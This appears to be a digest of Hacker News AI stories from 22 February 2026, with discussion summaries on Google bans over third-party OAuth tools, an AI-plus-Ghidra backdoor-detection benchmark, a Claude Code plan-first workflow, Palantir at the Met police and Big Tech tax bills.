AI Submissions for Sun Feb 22 2026
Google restricting Google AI Pro/Ultra subscribers for using OpenClaw
Submission URL | 738 points | by srigi | 634 comments
Google AI Ultra/“Antigravity” users report sudden account bans after third‑party OAuth
- Multiple paying subscribers say their AI Ultra/Antigravity access was abruptly restricted (403 “service disabled”), often right after connecting Gemini via third‑party tools like OpenClaw/OpenCode. No warning or clear violation notice preceded the lockouts.
- Support has been described as unresponsive or circular: users were bounced between Google Cloud and Google One, with some saying they’ve waited days or weeks without resolution.
- One user shared a formal response from Google stating an internal investigation found use of credentials in the third‑party “open claw” tool violated Terms of Service by “using Antigravity servers to power a non‑Antigravity product.” Google called it a zero‑tolerance issue and said suspensions won’t be reversed.
- Frustration is high among annual prepay customers; several report canceling other Google services, considering chargebacks, or migrating to alternatives (e.g., Claude Code). Others suggest creating a new account as a workaround.
- A recurring pain point: the in‑app “Report Issue” path isn’t usable once you’re locked out.
Takeaway: Third‑party OAuth into paid AI accounts appears risky under Google’s ToS enforcement; users are calling for clearer rules, pre‑ban warnings, and a working appeal path before permanent suspensions.
Here is a summary of the discussion:
- Exploit vs. Legitimate Use: A contentious debate emerged regarding the nature of the third-party tools (like "OpenClaw"). Some commenters viewed the usage as a clear "exploit" or "script kiddie" behavior—likening it to sharing a parking lot access code with the entire internet until the lot jams—arguing that handing OAuth tokens to third-party apps is a major security lapse. Conversely, others argued these are technically paying customers trying to utilize a product they purchased, and that Google unilaterally changed the Terms of Service to punish legitimate demand that their official apps didn't support.
- The "Digital Death Penalty": The strongest criticism focused on the severity of the punishment. Users argued that permanently banning an entire Google Workspace or personal account (cutting off Gmail, Drive, and GCP) for a violation in a specific AI service introduces a "novel business risk." Commenters described the fear of accidentally violating obscure rules and losing their entire digital life as "insane," with some comparing it to a disproportionate "video game ban" applied to critical infrastructure.
- Google's Response & Infrastructure: A comment linked to a Google employee’s statement claiming the bans were triggered because the "massive increase in malicious usage" was degrading service quality for everyone. However, critics countered that this reflects a failure in Google's quota management; rather than banning paying customers ($200+/month), the system should simply enforce rate limits, API caps, or "backpressure" to manage load without nuking accounts.
- Market Implications: The incident is driving sentiment toward diversifying away from relying on a single "megacorp" for all digital services. Users noted this situation serves as a strong advertisement for self-hosted/local LLMs, as the risk of arbitrary lockouts makes proprietary cloud dependencies increasingly unattractive for business-critical workflows.
We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them
Submission URL | 234 points | by jakozaur | 92 comments
AI + Ghidra vs. backdoored binaries: promising, but not production-ready
-
What they did: A team hid backdoors in compiled executables (around 40 MB) and asked AI agents, wired into Ghidra and standard RE tooling, to find them—no source code allowed. They’ve released an open benchmark and tasks as BinaryAudit (github.com/quesmaOrg/BinaryAudit), with a results dashboard covering false positives, tool proficiency, and a Pareto view of cost-effectiveness.
-
Why it matters: Real-world attacks increasingly swap or taint binaries and firmware (e.g., recent NPM supply-chain malware, the Notepad++ hijack, and findings in trains/solar inverters). Many targets are closed-source; binary analysis is the only line of defense.
-
How hard is this? Compilers strip structure and symbols, then optimize aggressively, making reverse engineering rely on disassembly and decompilation (e.g., Ghidra) back to pseudo-C. The post walks through an example that ultimately funnels user-controlled bytes into a system() call.
-
Key results:
- Best model (Claude Opus 4.6) caught “relatively obvious” backdoors in small/mid-size binaries only 49% of the time.
- Most models showed high false-positive rates, flagging clean binaries.
- Conclusion: Today’s AI agents can sometimes spot real red flags but are far from reliable for standalone binary vetting.
-
Takeaway: Treat LLMs as noisy triage helpers alongside traditional RE tools and human experts; don’t rely on them for final judgments on shipped binaries or firmware.
Links: BinaryAudit results and benchmark details on the project site; tasks are open source at github.com/quesmaOrg/BinaryAudit.
Based on the discussion, users analyzed the effectiveness of combining LLMs with reverse engineering (RE) tools like Ghidra. While skeptics noted that current models struggle with complex logic and obfuscation, others shared specific workflows and tools that have proven successful for tasks like file format parsing and basic cracking.
Methodology and Context Much of the debate focused on the "fairness" and realism of the benchmark tasks.
- Documentation vs. Autonomy: Several users argued that restricting AI from accessing tool documentation (to test "autonomy") is unrealistic. Users
btsrsandnmxssuggested that just as human specialists use manuals, AI performance improves significantly when the context window is "stuffed" with Ghidra tutorials and API docs. - Obfuscation: Commenter
7777332215noted that while simple string obfuscation lowers success rates, LLMs excel at detecting pattern-based anomalies.kslvadded that asking a model to RE obfuscated code causes it to "spin in circles," but instructing it to explicitly identify obfuscation works better.
Benchmark Critique: The Dropbear Task
User cmx performed a deep dive into one of the benchmark tasks (a backdoored Dropbear SSH server).
- Heuristics vs. Understanding:
cmxobserved that Claude identified the correct function (svr_auth_password) but likely did so based on heuristics (it is a standard target for backdoors) rather than successfully analyzing the assembly. - Human vs. AI: Interestingly,
cmxadmitted to initially failing the same task manually by analyzing the wrong function, highlighting that while the AI might be guessing, the task itself is difficult for humans without recognized patterns.
Tooling and Workflows
- Ghidra-CLI: User
kslvshared their toolghidra-cli, a REPL interface designed for LLMs, claiming it was "insanely effective" for reverse engineering the Altium file format (Delphi). They argued models are particularly good at writing parsers from scratch. - The "Swiss Army Knife" Approach: User
btxpldrdescribed using agents not for final judgments, but to automate high-level grunt work—like mapping attack surfaces or generating architecture diagrams—allowing the human to focus on deep investigation. They warned of the "productivity trap" where one spends more time prompting the AI than doing the work manually. - Cracks vs. Backdoors: User
hereme888claimed success using Claude Opus and Ghidra plugins to fully reverse engineer software cracks, though they acknowledged this is different from detecting state-level hidden backdoors.
Concerns
- Training Data: Users questioned whether models were simply recalling solutions to known "crackmes" from their training data. However,
kslvnoted that performance remains consistent even on challenges released days or weeks ago. - Productivity:
jkzrnoted that some Python bindings (PyGhidra) are too slow, making CLI approaches more viable for agent loops.
Show HN: TLA+ Workbench skill for coding agents (compat. with Vercel skills CLI)
Submission URL | 40 points | by youio | 4 comments
agent-skills (GitHub) — A brand-new repo from younes-io popped up on HN. From the snippet we only see the GitHub chrome (6 stars, 0 forks) and no README details, so specifics are unclear. Judging by the name, it may be a collection of reusable “skills” for AI agents, but consider this a placeholder to watch—if you’re tracking agent tooling, bookmark it and check back as the project fleshes out.
agent-skills
The creator (y) clarified the project’s purpose in the comments, describing it as a suite of skills for coding-agent workflows. The repository currently features a tlaplus-workbench skill designed to help agents convert natural language designs into TLA+ configuration files, run the TLC model checker, and summarize counterexamples. The author provided npx commands for users to try the tool and requested feedback on its utility for protocol and state-machine modeling. Discussion briefly touched on whether the tool references official language grammar for PlusCal and the potential for using formal TLA+ specifications alongside real code to improve LLM reasoning.
How I use Claude Code: Separation of planning and execution
Submission URL | 932 points | by vinhnx | 568 comments
TL;DR: After 9 months using Claude Code as a primary dev tool, the author’s winning tactic is strict separation of planning and execution. Never let the model write code until you’ve reviewed and approved a written plan. This human-in-the-loop workflow reduces wasted effort, preserves architectural control, and outperforms prompt-fix-repeat and agent loops—often with fewer tokens.
How it works:
- Phase 1 — Research: Force a deep read of the relevant code, then require a persistent artifact (research.md). Use loaded language (“deeply,” “intricacies,” “go through everything”) so the model doesn’t skim. This surfaces misunderstandings early and prevents the costliest failure mode: correct code that violates the surrounding system (caches, ORM conventions, duplicated logic, etc.).
- Phase 2 — Plan: Ask for plan.md with real file paths, concrete code snippets, approach trade-offs, and references to actual source. Ignore built-in plan modes; a markdown file is editable, reviewable, and part of the repo.
- Reference-first: When possible, supply a high-quality OSS implementation as a template. The model is dramatically better adapting a concrete reference than inventing from scratch.
- Annotation cycle: You edit plan.md inline—adding corrections, constraints, domain knowledge—then send it back for updates. Repeat until satisfied. Short notes (“not optional”) or longer business-context blocks both work.
- Then and only then: Generate a focused TODO, implement against the approved plan, and iterate with feedback.
Why it wins:
- Prevents garbage-in/garbage-out mistakes
- Keeps you in charge of architecture and trade-offs
- Produces more reliable changes with less churn and lower token spend
If you’ve found AI codegen flaky on non-trivial tasks, this plan-first, artifact-driven loop is the fix.
Based on the discussion, here is a summary of the comments:
Validation of the "Plan-First" Approach Many users validated the author's central thesis: that LLMs are "assumption engines" that tend to fill gaps with industry standards which may not fit specific project needs.
- Commenters agreed that LLMs rarely fail on simple syntax, but frequently fail on "invisible assumptions," architectural constraints, and system invariants.
- One user described the written plan not just as documentation, but as a "test harness" for constraints (latency, concurrency, memory budgets) that helps catch architecture-level mistakes before code is generated.
- The consensus was that forcing a plan effectively stops the model from "reverting to the mean" and brings hidden assumptions to the surface.
Debate: "Magic Words" vs. Architecture A significant portion of the discussion focused on the author's advice to use "loaded language" (e.g., "deeply," "intricacies") into prompts to improve performance.
- The Skeptics: Some users dismissed this as "magical thinking" or "superstition," comparing it to performing rituals for a "random word machine." They argued that unless there are rigorous statistics, this is just anthropomorphizing the model.
- The Theorists: Others offered technical explanations for why this works. One theory is that these words trigger specific weights in the Attention mechanism, associating the prompt with high-quality training data (like detailed StackOverflow explanations or expert tutorials).
- The MoE Theory: Several users debated whether this forces Mixture of Experts (MoE) models to route the query to a "smarter" expert path, though others argued that MoE routing is based on token type rather than semantic complexity in that specific way.
- Research: One user pointed to academic papers regarding "emotional stimuli" in prompts (e.g., telling the model a task is vital) as proof that phrasing impacts output quality.
Workflow and Agents There was technical discussion on how to implement this loop:
- Users debated the specific benefit of sequential prompts vs. "agents." The consensus leaned toward sequential steps to avoid "context pollution"—where a long-running agent session gets confused by potential hallucinations or previous step details.
- One user warned against building "black box" agent swarms, advocating instead for a single-agent orchestrator with strict logging and human-reviewed "pull requests" or checkpoints.
Counterpoints
- Directly contradicting the author's experience, one user shared a horror story where Claude Code burned $20 in 30 minutes looping on a simple Rust syntax/API hallucination, suggesting that LLMs can and do still fail on basic implementation details.
Met police using AI tools supplied by Palantir to flag officer misconduct
Submission URL | 37 points | by helsinkiandrew | 6 comments
The UK’s Metropolitan Police is piloting Palantir’s AI to sift internal HR-style signals—sickness, absences, overtime—in order to flag potential misconduct patterns among its 46,000 staff. The Met says the system only surfaces patterns and humans make the calls; the Police Federation calls it “automated suspicion,” warning workload or illness could be misread as wrongdoing. The move lands amid Palantir’s expanding UK public-sector footprint (NHS data platform, MoD deal) and political scrutiny over transparency and influence, prompting an MP to ask, “Who is watching Palantir?” Labour’s recent policing paper backs rapid, “responsible” AI rollout across all 43 forces with £115m over three years, signaling this kind of tooling could scale beyond the Met. Palantir says its software is improving public services; critics see a fresh layer of opaque workplace surveillance in a force already under fire for cultural failings.
Discussion Summary:
Commenters focus heavily on the irony of the Police Federation’s complaints, pointing out that while the union decries "automated suspicion" and opaque tools when applied to officers, police departments rarely hesitate to deploy similar surveillance against the general public. One user draws a parallel to the anime Ghost in the Shell: Stand Alone Complex, speculating that the Met might eventually find itself investigating Palantir's own interests. Others note a perceived recent increase in positive PR stories surrounding Palantir, viewing them with skepticism, while some readers report hitting a paywall.
Amazon, Meta, Alphabet report plunging tax bills thanks to AI and tax changes
Submission URL | 44 points | by epistasis | 40 comments
Big Tech’s 2025 US tax bills tumble on AI buildout and new expensing rules
- What happened: Amazon, Meta, and Alphabet reported sharply lower 2025 US tax bills, citing last year’s pro-business tax changes in Trump’s “One Big Beautiful Bill” plus massive AI/data center investments.
- The numbers:
- Amazon: ~$9B (2024) → $1.2B (2025) federal tax; total payments this year $2.75B. Domestic profit ~ $90B (+40%+).
- Meta: ~$9.6B → $2.8B federal tax. Domestic profit $79.6B (+20%).
- Alphabet: $21.1B → $13.8B combined federal+state tax. Domestic profit $143.6B (+32%).
- Why taxes fell: New deductions/credits for depreciation, capital investment, R&D, interest; most notably 100% expensing for new/updated factories. Much of the benefit is timing—big deferrals now, higher taxes later.
- Deferred taxes: Amazon >$11B; Meta >$18B; Alphabet ~ $8B.
- Company stance: “We’re following the rules.” Amazon says it invested $340B in the US in 2025 (including AI). Meta’s CFO flagged “substantial cash tax savings.”
- Criticism: ITEP estimates AMZN/META/GOOG plus Tesla “avoided” nearly $50B versus the 21% statutory rate; Tesla paid zero federal tax for 2025. More disclosures from large firms still to come.
Why it matters
- Near-term boost to earnings and cash flow could fuel more AI capex and shareholder returns; some of it reverses as deferrals unwind.
- Strong incentives for US-based data center and factory buildouts likely pull AI infrastructure timelines forward.
- Optics risk: plunging taxes amid soaring profits may invite policy backlash and future rule changes.
Discussion Summary:
The comment section evolved into a broad debate covering tax mechanics, wealth inequality, and the efficiency of government spending.
- Wealth Inequality vs. Incentives: A heated philosophical dispute emerged regarding wealth accumulation. Radical suggestions were made to cap personal wealth at specific limits (ranging from $200k to $1M) to solve inequality, though these were met with skepticism regarding their economic feasibility, the definition of "luxury," and the destruction of incentives.
- Tax Burden Realities: Users corrected the misconception that large corporations fund the majority of the government. Commenters pointed out that individual income taxes and payroll taxes make up the vast majority of federal revenue, while corporate taxes constitute a much smaller fraction (roughly 10%).
- Accounting Mechanics: There was a specific discussion regarding the rules of writing off expenses. Users clarified that taxes are levied on profit rather than revenue, and noted recent changes to Section 174 which require software R&D expenses to be amortized over years rather than immediately expensed (though the summaries in the article highlight capital expensing for physical infrastructure like data centers).
- The California Debate: The conversation drifted into a debate about California as a case study for high taxation. While some users criticized the state for squandering tax revenue on inefficient programs, others defended the cost as the price for labor rights, environmental protections, and a higher quality of life, attributing high costs to restrictive zoning laws rather than taxes alone.